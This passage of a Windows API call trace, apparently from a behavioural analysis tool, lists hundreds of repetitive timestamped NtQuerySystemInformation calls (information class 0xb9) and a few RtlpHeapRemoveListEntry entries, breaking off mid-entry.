NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.364] RtlpHeapRemoveListEntry () [0241.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.374] RtlpHeapRemoveListEntry () [0241.378] RtlpHeapRemoveListEntry () [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.400] RtlpHeapRemoveListEntry () [0241.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.407] RtlpHeapRemoveListEntry () [0241.410] RtlpHeapRemoveListEntry () [0241.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.431] RtlpHeapRemoveListEntry () [0241.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.439] RtlpHeapRemoveListEntry () [0241.442] RtlpHeapRemoveListEntry () [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.449] NtQuerySystemInformation 